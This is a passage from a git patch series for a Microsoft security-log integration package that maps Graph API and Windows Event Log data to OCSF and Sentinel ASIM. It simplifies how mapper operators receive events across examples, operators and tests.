Activity",type_uid:100901,type_name:"Script Activity: Execute",name:"ocsf.script_activity"} +warning: assertion failed: {reason:"unsupported OCSF to ASIM mapping",class_uid:1009,class_name:"Script Activity",type_uid:100901,type_name:"Script Activity: Execute",name:"ocsf.script_activity"} From 5679aaf4658b87ab9dcf6d4e92d6f0e87c4a5d1e Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Thu, 11 Jun 2026 17:31:27 +0200 Subject: [PATCH 21/27] Pass current events directly to mappers Remove temporary event aliases from Microsoft examples and tests now that the mappers take a named event argument. Make mapper cleanup drops optional so direct event=this calls do not emit field-not-found warnings after the current event shape changes. Assisted-by: GPT-5 (Codex) --- .../changelog/unreleased/ocsf-to-asim-mapper.md | 14 ++++++++------ .../examples/graph-defender-alerts-to-ocsf.tql | 4 +--- .../examples/graph-defender-incidents-to-ocsf.tql | 4 +--- .../examples/graph-directory-audits-to-ocsf.tql | 4 +--- .../examples/graph-intune-compliance-to-ocsf.tql | 4 +--- .../graph-intune-detected-apps-to-ocsf.tql | 4 +--- .../graph-intune-managed-devices-to-ocsf.tql | 4 +--- .../examples/graph-risk-detections-to-ocsf.tql | 4 +--- microsoft/examples/graph-risky-users-to-ocsf.tql | 4 +--- microsoft/examples/graph-sign-ins-to-asim.tql | 8 ++------ microsoft/examples/graph-sign-ins-to-ocsf.tql | 4 +--- microsoft/examples/windows-event-log-to-asim.tql | 4 +--- microsoft/operators/asim/ocsf/account_change.tql | 2 +- microsoft/operators/asim/ocsf/authentication.tql | 2 +- .../operators/asim/ocsf/authorize_session.tql | 2 +- .../operators/asim/ocsf/compliance_finding.tql | 2 +- .../operators/asim/ocsf/detection_finding.tql | 2 +- microsoft/operators/asim/ocsf/dhcp_activity.tql | 2 +- microsoft/operators/asim/ocsf/dns_activity.tql | 2 +- .../operators/asim/ocsf/entity_management.tql | 2 +- .../operators/asim/ocsf/event_log_activity.tql | 2 +- .../operators/asim/ocsf/file_system_activity.tql | 2 +- microsoft/operators/asim/ocsf/group_management.tql | 2 +- microsoft/operators/asim/ocsf/http_activity.tql | 2 +- microsoft/operators/asim/ocsf/network_activity.tql | 2 +- microsoft/operators/asim/ocsf/process_activity.tql | 2 +- .../operators/asim/ocsf/scheduled_job_activity.tql | 2 +- .../asim/ocsf/windows_service_activity.tql | 2 +- microsoft/operators/graph/ocsf/map.tql | 2 +- microsoft/tests/asim/graph.tql | 8 ++------ microsoft/tests/asim/ocsf.tql | 4 +--- microsoft/tests/asim/ocsf/account_change.tql | 4 +--- microsoft/tests/asim/ocsf/authentication.tql | 4 +--- microsoft/tests/asim/ocsf/detection_finding.tql | 4 +--- microsoft/tests/asim/ocsf/dhcp_activity.tql | 4 +--- microsoft/tests/asim/ocsf/dns_activity.tql | 4 +--- microsoft/tests/asim/ocsf/event_log_activity.tql | 4 +--- microsoft/tests/asim/ocsf/file_system_activity.tql | 4 +--- microsoft/tests/asim/ocsf/group_management.tql | 4 +--- microsoft/tests/asim/ocsf/http_activity.tql | 4 +--- microsoft/tests/asim/ocsf/network_activity.tql | 4 +--- microsoft/tests/asim/ocsf/process_activity.tql | 4 +--- microsoft/tests/asim/windows.tql | 4 +--- .../compliance-policy-setting-state-summaries.tql | 4 +--- microsoft/tests/graph/ocsf/defender-alerts.tql | 4 +--- microsoft/tests/graph/ocsf/defender-incidents.tql | 4 +--- microsoft/tests/graph/ocsf/detected-apps.tql | 4 +--- microsoft/tests/graph/ocsf/directory-audits.tql | 4 +--- microsoft/tests/graph/ocsf/managed-devices.tql | 4 +--- microsoft/tests/graph/ocsf/risk-detections.tql | 4 +--- microsoft/tests/graph/ocsf/risky-users.tql | 4 +--- microsoft/tests/graph/ocsf/sign-ins.tql | 4 +--- 52 files changed, 61 insertions(+), 131 deletions(-) diff --git a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md index a59053f..68e1d23 100644 --- a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md +++ b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md @@ -14,12 +14,14 @@ Microsoft events into flat Microsoft Sentinel ASIM event records. The mapper uses the new `microsoft::ocsf::map` entry point and `microsoft::asim::ocsf::map` for validated OCSF 1.8 events. -Microsoft mapping operators now treat the current event as the source event to -map. For raw Windows Event Log XML, first run `this = data.parse_winlog()`; -the resulting structured event can then be normalized through -`microsoft::ocsf::map` or `microsoft::asim::map`. Mapping operators accept an -optional `raw` value when the original source payload is still available and -should be preserved in OCSF `raw_data` and `raw_data_size`. +Microsoft mapping operators now accept the source event through the named +`event` argument. For raw Windows Event Log XML, first run +`win = data.parse_winlog()`; the resulting structured event can then be +normalized through `microsoft::windows::ocsf::map event=win`. Validated OCSF +events can be converted with `microsoft::asim::map event=this` or +`microsoft::asim::ocsf::map event=this`. Mapping operators accept an optional +`raw` value when the original source payload is still available and should be +preserved in OCSF `raw_data` and `raw_data_size`. The mapper covers the Microsoft package's current OCSF authentication, process, audit, user-management, and alert outputs, plus direct OCSF counterparts for diff --git a/microsoft/examples/graph-defender-alerts-to-ocsf.tql b/microsoft/examples/graph-defender-alerts-to-ocsf.tql index 5432695..3b5189b 100644 --- a/microsoft/examples/graph-defender-alerts-to-ocsf.tql +++ b/microsoft/examples/graph-defender-alerts-to-ocsf.tql @@ -8,8 +8,6 @@ microsoft::graph::defender::alerts \ client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET"), lookback=5m -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/examples/graph-defender-incidents-to-ocsf.tql b/microsoft/examples/graph-defender-incidents-to-ocsf.tql index f7d5ccd..126f5a6 100644 --- a/microsoft/examples/graph-defender-incidents-to-ocsf.tql +++ b/microsoft/examples/graph-defender-incidents-to-ocsf.tql @@ -9,9 +9,7 @@ every 5m { client_secret=secret("CLIENT_SECRET"), lookback=5m } -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-directory-audits-to-ocsf.tql b/microsoft/examples/graph-directory-audits-to-ocsf.tql index 6cbec07..d4880e2 100644 --- a/microsoft/examples/graph-directory-audits-to-ocsf.tql +++ b/microsoft/examples/graph-directory-audits-to-ocsf.tql @@ -9,9 +9,7 @@ every 5m { client_secret=secret("CLIENT_SECRET"), lookback=5m } -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-compliance-to-ocsf.tql b/microsoft/examples/graph-intune-compliance-to-ocsf.tql index a5f4567..b0475dc 100644 --- a/microsoft/examples/graph-intune-compliance-to-ocsf.tql +++ b/microsoft/examples/graph-intune-compliance-to-ocsf.tql @@ -8,9 +8,7 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql index 20d3bc1..7ff5f48 100644 --- a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql +++ b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql @@ -8,9 +8,7 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql index b19b182..01f0a72 100644 --- a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql +++ b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql @@ -7,8 +7,6 @@ microsoft::graph::intune::managed_devices \ tenant_id="TENANT_ID", client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/examples/graph-risk-detections-to-ocsf.tql b/microsoft/examples/graph-risk-detections-to-ocsf.tql index 191cac5..c81613b 100644 --- a/microsoft/examples/graph-risk-detections-to-ocsf.tql +++ b/microsoft/examples/graph-risk-detections-to-ocsf.tql @@ -8,9 +8,7 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-risky-users-to-ocsf.tql b/microsoft/examples/graph-risky-users-to-ocsf.tql index e0584d5..8396a6b 100644 --- a/microsoft/examples/graph-risky-users-to-ocsf.tql +++ b/microsoft/examples/graph-risky-users-to-ocsf.tql @@ -8,9 +8,7 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-sign-ins-to-asim.tql b/microsoft/examples/graph-sign-ins-to-asim.tql index 193eb60..58b48a4 100644 --- a/microsoft/examples/graph-sign-ins-to-asim.tql +++ b/microsoft/examples/graph-sign-ins-to-asim.tql @@ -9,11 +9,7 @@ microsoft::graph::sign_ins \ client_secret=secret("CLIENT_SECRET"), lookback=5m @name = "microsoft.graph.sign_in" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast -event = this -microsoft::asim::map event=event -this = event +microsoft::asim::map event=this diff --git a/microsoft/examples/graph-sign-ins-to-ocsf.tql b/microsoft/examples/graph-sign-ins-to-ocsf.tql index 96f5a04..396489c 100644 --- a/microsoft/examples/graph-sign-ins-to-ocsf.tql +++ b/microsoft/examples/graph-sign-ins-to-ocsf.tql @@ -8,8 +8,6 @@ microsoft::graph::sign_ins \ client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET"), lookback=5m -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/examples/windows-event-log-to-asim.tql b/microsoft/examples/windows-event-log-to-asim.tql index b5ba3c3..92a7fe2 100644 --- a/microsoft/examples/windows-event-log-to-asim.tql +++ b/microsoft/examples/windows-event-log-to-asim.tql @@ -13,6 +13,4 @@ win.raw_data_size = win.raw_data.length_bytes() this = win ocsf::derive ocsf::cast -event = this -microsoft::asim::map event=event -this = event +microsoft::asim::map event=this diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 5d3bda3..0b7d201 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -52,4 +52,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 48e7b06..aae1000 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -65,4 +65,4 @@ if ocsf.auth_factors? != null { } $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index 1597761..ce2a78e 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -62,4 +62,4 @@ if ocsf.auth_factors? != null { } $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index efc0a01..4a0a5b0 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -47,4 +47,4 @@ match ocsf.verdict? { } $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 510424b..b061cee 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -62,4 +62,4 @@ match ocsf.verdict? { } $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 9973929..d785bc4 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -27,4 +27,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcMacAddr = ocsf.src_endpoint?.mac? $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 1f0b6e9..b523a92 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -32,4 +32,4 @@ asim.DstIpAddr = ocsf.dst_endpoint?.ip? asim.DstHostname = ocsf.dst_endpoint?.hostname? $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index de663a9..4fb8972 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -46,4 +46,4 @@ asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index eda9813..b2ed048 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -46,4 +46,4 @@ asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 37cf962..7a62c1a 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -42,4 +42,4 @@ if ocsf.activity_name == "Rename" and ocsf.file_result? != null { asim.TargetFilePathType = "Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local" $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 2437da8..67b7eae 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -48,4 +48,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 92f6e13..c418c51 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -25,4 +25,4 @@ if ocsf.http_response?.code? != null { } $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index 70b9a6b..9174575 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -40,4 +40,4 @@ match ocsf.disposition? { } $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 0d94a2c..48212e1 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -36,4 +36,4 @@ asim.TargetProcessCommandLine = ocsf.process?.cmd_line? asim.TargetUserId = ocsf.user?.uid? $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index 1444363..f77cdf2 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -46,4 +46,4 @@ asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index ae5e1b5..5cecccb 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -46,4 +46,4 @@ asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? $event = {...asim, AdditionalFields: ocsf} -drop ocsf, asim +drop ocsf?, asim? diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index 1489dc1..1cb726f 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -70,4 +70,4 @@ match @name { } $event = {...ocsf, unmapped: graph} -drop graph, ocsf +drop graph?, ocsf? diff --git a/microsoft/tests/asim/graph.tql b/microsoft/tests/asim/graph.tql index ec0b8ec..a23870f 100644 --- a/microsoft/tests/asim/graph.tql +++ b/microsoft/tests/asim/graph.tql @@ -2,13 +2,9 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { read_json } @name = "microsoft.graph.sign_in" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast -event = this -microsoft::asim::map event=event -this = event +microsoft::asim::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf.tql b/microsoft/tests/asim/ocsf.tql index 1dd292b..1b8dd42 100644 --- a/microsoft/tests/asim/ocsf.tql +++ b/microsoft/tests/asim/ocsf.tql @@ -30,7 +30,5 @@ from { ip: 10.0.0.1, }, } -event = this -microsoft::asim::map event=event -this = event +microsoft::asim::map event=this name = @name diff --git a/microsoft/tests/asim/ocsf/account_change.tql b/microsoft/tests/asim/ocsf/account_change.tql index 93c9845..370e3fb 100644 --- a/microsoft/tests/asim/ocsf/account_change.tql +++ b/microsoft/tests/asim/ocsf/account_change.tql @@ -77,8 +77,6 @@ from { } @name = "ocsf.account_change" where class_uid == 3001 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalType diff --git a/microsoft/tests/asim/ocsf/authentication.tql b/microsoft/tests/asim/ocsf/authentication.tql index 092e691..d0ed7ed 100644 --- a/microsoft/tests/asim/ocsf/authentication.tql +++ b/microsoft/tests/asim/ocsf/authentication.tql @@ -143,8 +143,6 @@ from { }, } @name = "ocsf.authentication" -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/detection_finding.tql b/microsoft/tests/asim/ocsf/detection_finding.tql index ea4bd97..1b243e5 100644 --- a/microsoft/tests/asim/ocsf/detection_finding.tql +++ b/microsoft/tests/asim/ocsf/detection_finding.tql @@ -51,7 +51,5 @@ from { ], } @name = "ocsf.detection_finding" -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name diff --git a/microsoft/tests/asim/ocsf/dhcp_activity.tql b/microsoft/tests/asim/ocsf/dhcp_activity.tql index ab5dce3..ffb274f 100644 --- a/microsoft/tests/asim/ocsf/dhcp_activity.tql +++ b/microsoft/tests/asim/ocsf/dhcp_activity.tql @@ -183,8 +183,6 @@ from { }, } where class_uid == 4004 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/dns_activity.tql b/microsoft/tests/asim/ocsf/dns_activity.tql index aaebb7e..327881f 100644 --- a/microsoft/tests/asim/ocsf/dns_activity.tql +++ b/microsoft/tests/asim/ocsf/dns_activity.tql @@ -183,8 +183,6 @@ from { }, } where class_uid == 4003 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/event_log_activity.tql b/microsoft/tests/asim/ocsf/event_log_activity.tql index e96d16e..9a65f42 100644 --- a/microsoft/tests/asim/ocsf/event_log_activity.tql +++ b/microsoft/tests/asim/ocsf/event_log_activity.tql @@ -39,7 +39,5 @@ from { }, } @name = "ocsf.event_log_activity" -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name diff --git a/microsoft/tests/asim/ocsf/file_system_activity.tql b/microsoft/tests/asim/ocsf/file_system_activity.tql index 2fdaa6b..f1792ec 100644 --- a/microsoft/tests/asim/ocsf/file_system_activity.tql +++ b/microsoft/tests/asim/ocsf/file_system_activity.tql @@ -183,8 +183,6 @@ from { }, } where class_uid == 1001 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/group_management.tql b/microsoft/tests/asim/ocsf/group_management.tql index 2290440..a3adc02 100644 --- a/microsoft/tests/asim/ocsf/group_management.tql +++ b/microsoft/tests/asim/ocsf/group_management.tql @@ -77,8 +77,6 @@ from { } @name = "ocsf.group_management" where class_uid == 3006 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalType diff --git a/microsoft/tests/asim/ocsf/http_activity.tql b/microsoft/tests/asim/ocsf/http_activity.tql index 0aad2b6..a6e0fab 100644 --- a/microsoft/tests/asim/ocsf/http_activity.tql +++ b/microsoft/tests/asim/ocsf/http_activity.tql @@ -183,8 +183,6 @@ from { }, } where class_uid == 4002 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/network_activity.tql b/microsoft/tests/asim/ocsf/network_activity.tql index 7464df1..e590998 100644 --- a/microsoft/tests/asim/ocsf/network_activity.tql +++ b/microsoft/tests/asim/ocsf/network_activity.tql @@ -183,8 +183,6 @@ from { }, } where class_uid == 4001 -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/process_activity.tql b/microsoft/tests/asim/ocsf/process_activity.tql index f274b93..c99aad2 100644 --- a/microsoft/tests/asim/ocsf/process_activity.tql +++ b/microsoft/tests/asim/ocsf/process_activity.tql @@ -55,7 +55,5 @@ from { }, } @name = "ocsf.process_activity" -event = this -microsoft::asim::ocsf::map event=event -this = event +microsoft::asim::ocsf::map event=this name = @name diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql index 380fadb..c1069a4 100644 --- a/microsoft/tests/asim/windows.tql +++ b/microsoft/tests/asim/windows.tql @@ -8,8 +8,6 @@ win.raw_data_size = win.raw_data.length_bytes() this = win ocsf::derive ocsf::cast -event = this -microsoft::asim::map event=event -this = event +microsoft::asim::map event=this name = @name drop AdditionalFields.metadata.processed_time? diff --git a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql index 0458603..5d4e209 100644 --- a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql +++ b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql @@ -2,9 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/compliance-policy-setting-state-summari read_json } @name = "microsoft.graph.intune.compliance_policy_setting_state_summary" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-alerts.tql b/microsoft/tests/graph/ocsf/defender-alerts.tql index 1c11eb4..cf784ee 100644 --- a/microsoft/tests/graph/ocsf/defender-alerts.tql +++ b/microsoft/tests/graph/ocsf/defender-alerts.tql @@ -2,8 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-alerts.ndjson" { read_json } @name = "microsoft.graph.defender.alert" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-incidents.tql b/microsoft/tests/graph/ocsf/defender-incidents.tql index 47eeb98..e0c015e 100644 --- a/microsoft/tests/graph/ocsf/defender-incidents.tql +++ b/microsoft/tests/graph/ocsf/defender-incidents.tql @@ -2,9 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-incidents.ndjson" { read_json } @name = "microsoft.graph.defender.incident" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast sort time, metadata.original_event_uid diff --git a/microsoft/tests/graph/ocsf/detected-apps.tql b/microsoft/tests/graph/ocsf/detected-apps.tql index 30f8d42..1637d4e 100644 --- a/microsoft/tests/graph/ocsf/detected-apps.tql +++ b/microsoft/tests/graph/ocsf/detected-apps.tql @@ -2,9 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/detected-apps.ndjson" { read_json } @name = "microsoft.graph.intune.detected_app" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/directory-audits.tql b/microsoft/tests/graph/ocsf/directory-audits.tql index 729d082..95f4e46 100644 --- a/microsoft/tests/graph/ocsf/directory-audits.tql +++ b/microsoft/tests/graph/ocsf/directory-audits.tql @@ -2,9 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/directory-audits.ndjson" { read_json } @name = "microsoft.graph.directory_audit" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast sort time diff --git a/microsoft/tests/graph/ocsf/managed-devices.tql b/microsoft/tests/graph/ocsf/managed-devices.tql index db70247..02f9820 100644 --- a/microsoft/tests/graph/ocsf/managed-devices.tql +++ b/microsoft/tests/graph/ocsf/managed-devices.tql @@ -2,8 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/managed-devices.ndjson" { read_json } @name = "microsoft.graph.intune.managed_device" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/risk-detections.tql b/microsoft/tests/graph/ocsf/risk-detections.tql index 70bfa49..444acb3 100644 --- a/microsoft/tests/graph/ocsf/risk-detections.tql +++ b/microsoft/tests/graph/ocsf/risk-detections.tql @@ -2,8 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risk-detections.ndjson" { read_json } @name = "microsoft.graph.identity_protection.risk_detection" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/risky-users.tql b/microsoft/tests/graph/ocsf/risky-users.tql index f032774..c7ea153 100644 --- a/microsoft/tests/graph/ocsf/risky-users.tql +++ b/microsoft/tests/graph/ocsf/risky-users.tql @@ -2,8 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risky-users.ndjson" { read_json } @name = "microsoft.graph.identity_protection.risky_user" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/sign-ins.tql b/microsoft/tests/graph/ocsf/sign-ins.tql index c826a17..65d3fb8 100644 --- a/microsoft/tests/graph/ocsf/sign-ins.tql +++ b/microsoft/tests/graph/ocsf/sign-ins.tql @@ -2,8 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { read_json } @name = "microsoft.graph.sign_in" -event = this -microsoft::ocsf::map event=event -this = event +microsoft::ocsf::map event=this ocsf::derive ocsf::cast From 26e5db741fcc44d1cb5d5f98f1488719ed5fd254 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Thu, 11 Jun 2026 17:50:31 +0200 Subject: [PATCH 22/27] Move mapper intermediates into output Use move-based record construction when replacing mapper input with the final OCSF or ASIM event. This removes the separate cleanup drops for consumed intermediate namespaces. Assisted-by: GPT-5 (Codex) --- microsoft/operators/asim/ocsf/account_change.tql | 3 +-- microsoft/operators/asim/ocsf/authentication.tql | 3 +-- microsoft/operators/asim/ocsf/authorize_session.tql | 3 +-- microsoft/operators/asim/ocsf/compliance_finding.tql | 3 +-- microsoft/operators/asim/ocsf/detection_finding.tql | 3 +-- 